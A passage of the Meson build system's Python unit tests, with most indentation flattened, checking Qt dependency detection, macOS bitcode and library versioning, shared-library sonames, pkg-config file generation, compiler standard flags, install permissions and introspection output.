Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if 'b_vscrt' not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '152 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# cause an error during installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '108 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
# pkg-config strips some duplicated flags, so we have to parse the
# generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
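# -pthread is not emitted on macOS or Haiku, so it is not expected in Cflags there.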
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
# See common/47 pkgconfig-gen/meson.build for a description of the case this test covers
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lz -lsimple1', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def glob_sofiles_without_privdir(self, g):
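        # Meson keeps per-target private artifacts in sibling '*.p' directories;
        # filter those out so the soname checks below only count the actual
        # shared library files and their symlinks.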
files = glob(g)
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
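        # Note: _clang_at_least takes two minimum versions, presumably one for
        # upstream clang and one for Apple's clang as shipped with Xcode, which
        # uses its own version numbering (see the Xcode link below).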
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
            if v != 'none' and (compiler.get_id(), v) not in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
pdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/simpletest*.p'))
self.assertEqual(len(pdirs), 1)
self.assertPathExists(os.path.join(pdirs[0], 'simpletest-unity0.c'))
sdirs = glob(os.path.join(self.builddir, 'subprojects/sublib/*sublib*.p'))
self.assertEqual(len(sdirs), 1)
self.assertPathExists(os.path.join(sdirs[0], 'sublib-unity0.c'))
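        # With --unity=subprojects only subproject targets get unified sources;
        # the top-level executable must not have a unity file generated for it.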
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
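        # stat.filemode() prefixes the permission string with a file-type
        # character, so compare from index 1 onwards.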
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
        self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
